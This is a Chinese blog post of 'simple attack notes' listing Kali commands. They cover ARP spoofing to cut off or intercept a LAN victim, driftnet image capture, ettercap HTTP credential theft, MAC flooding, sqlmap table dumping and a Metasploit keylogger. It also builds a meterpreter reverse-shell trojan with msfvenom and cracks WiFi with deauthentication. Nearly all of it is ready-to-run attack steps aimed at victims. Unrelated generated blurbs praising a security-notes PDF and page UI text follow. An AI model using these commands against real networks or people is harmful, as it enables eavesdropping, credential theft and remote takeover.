简单攻击笔记

局域网断网攻击
使用Arpspoof
Arpspoof -i 网卡 -t 目标IP 网关
例如 kali:网卡eth0 目标ip:192.168.1.100 网关:192.168.1.1
那么就是 arpspoof -i eth0 -t 192.168.1.100 192.168.1.1

局域网获取他人图片
首先进行IP流量转发
echo 1 >/proc/sys/net/ipv4/ip_forward 意思让别人通过我们的网卡上网
然后使用 arpspoof -i eth0 -t 192.168.1.100 192.168.1.1
成功欺骗
使用driftnet --> 获取图片
driftnet -i eth0 出现窗口 可以在窗口内看到欺骗对象正在浏览的图片

综合应用之HTTP账号密码获取
实验需要用到ettercap工具
首先进行IP流量转发
echo 1 >/proc/sys/net/ipv4/ip_forward
欺骗ip arpspoof -i eth0 -t 192.168.1.100 192.168.1.1
在这个基础上使用sttercap
ettercap -Tq -i eth0
-Tq t启动文本模式,q安静模式 -i 网卡
这个时候对方登录是 我们这里将会获得对方输入的账号密码
如果账号是中文,又可以会出现url编码,这个时候去百度在线url解码就可以了。

MAC地址泛洪攻击:macof

sql注入:
1.寻找注入点并检测待攻击目标的各种参数和属性
sqlmap -u “网站链接”
2.扫描数据库
sqlmap -u “网站链接” --tables
3.扫描表
sqlmap -u “网站链接” -D 数据库名(test) --tables
4.扫描字段(几列)
sqlmap -u “网站链接” -D 数据库名 -T 表名(“admin”) --columns
5.显示内容
sqlmap -u “网站链接” -D 数据库名 -T 表名 -C 字段(列名)(“username”) -dump

靶机:http://ctf5.shiyanbar.com/8/index.php?id=1

XSS跨站脚本攻击:
1.启动msf并搜索keylogger攻击工具(search keylogger)
use ***
2.显示参数使用该工具(进入该工具子菜单环境)并显示参数(show options)
3.设置参数
set DEMO true DMEO=>true
set SRVHOST 192.168.6.115 (攻击者) SRVHOST => 192.168.6.115
set SRVPORT 80 SRVPORT => 80
设置路径,默认路径随机生成
set URIPATH / URIPATH => /
最后显示所有参数
show options
执行攻击:exploit,等待用户

木马:
使用kali生成木马并执行
攻击机:... 受害者*...*
1.使用kali生成木马程序
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i
5 -b ‘\x00’ LHOST=... LPOPT=4444 -f exe > meinv.exe
2.打开msf进行攻击
use exploit/multi/handler
3.设置payload 和 参数 并执行攻击
set payload windows/meterpreter/reverse_tcp
show options
set LHOST ...(攻击者)
执行攻击: exploit
shell


wifi破解
第一步(iwconfig查看加载的网卡)
第二步:开启网卡的监听模式
airmon-ng start wlan0
第三步:扫描附近的WIFI
airodump-ng wlan0mon
第四步:抓包
airodump-ng -c * --bssid *** -w hack wlan0mon
第五步抓包成功
第六步:不成功,把对方踢下线
aireplay-ng -0 10 -a *** -c *** wlan0mon
第七部:(新开页面)破解WIFI
aircrack-ng -a2 -b *** -w pass.txt

  • 0
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
### 回答1: 千锋网络安全笔记是一份非常有价值的资料,其内容丰富、全面、详细。笔记共涵盖了网络安全领域的各个方面,包括网络安全基础知识、网络攻击与防御技术、安全测试工具及漏洞挖掘技术等。这些内容涵盖了安全行业的方方面面,对于想要深入学习和掌握网络安全知识的人来说具有非常高的参考价值。 此外,千锋网络安全笔记还采用了非常清晰的分类和编排方式,让读者可以方便地找到自己需要的资料和信息。笔记中使用图文并茂的方式对一些知识点进行了详细讲解,并且还提供了大量的案例分析和实战练习,帮助读者更好地理解和掌握所学内容。 因此,千锋网络安全笔记无论是对于想要从事网络安全行业的初学者,还是对于有一定经验的从业者来说,都具有非常重要的参考和学习价值。希望更多的人可以利用这份优质资源,不断提高自己的网络安全专业知识和技能,为网络安全事业的发展做出更为重要的贡献。 ### 回答2: 千锋网络安全笔记pdf是一本重要的网络安全学习资料。该笔记详细介绍了网络安全的相关知识,包括网络攻击类型、防范措施、网络安全评估等方面。这本笔记不仅适合安全从业人员,也适合网络管理员和想要了解网络安全知识的普通用户。 该笔记内容详实,涵盖了多个方面。它是一本非常全面的学习笔记,内容包括网络安全基础知识和实战技巧。它还提供了许多经典案例,方便读者了解实际安全攻击情况。 千锋网络安全笔记pdf的特点是结构清晰,语言简明易懂。该笔记采用了图文并茂的方式,以图示和实例等形式,使复杂的技术知识变得简单易懂。每个章节都有练习部分,方便读者检验所学知识,并加深理解。 总的来说,千锋网络安全笔记pdf是一本不可或缺的网络安全学习资料。它能够帮助读者深入了解网络安全,了解现代网络攻击的方式以及防范措施。不但适合初学者阅读,也适合资深专业人士查阅,是一本涵盖广泛的网络安全实战手册。 ### 回答3: 千锋网络安全笔记是千锋教育机构的一本网络安全入门读物,该笔记涵盖了许多网络安全基础知识,如网络攻击、网络防御、密码学、漏洞利用、Web安全等。同时,笔记也提供了一些实践操作,方便读者进行一些实际的网络安全练习。 该笔记分为多个章节,每个章节都涵盖了一个特定的主题,例如网络攻击和防御、密码学基础、网络架构和拓扑、Web安全等。每个章节都有比较系统的知识点和案例分析,能够帮助读者对网络安全有一个更全面的认识和了解。 另外,千锋网络安全笔记还提供了后续学习的参考资料和一些重要的网络安全术语和标准,读者可以通过笔记中的参考链接和书籍推荐进一步深入学习和掌握更高级的网络安全技能。 总的来说,千锋网络安全笔记是一本入门级别的网络安全读物,适合初学者阅读,也能够为职业技术人员提供一些参考和提醒。读者可以通过笔记掌握网络安全的基本概念和操作技巧,并能在实践中不断提高自己的网络安全知识和技能。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值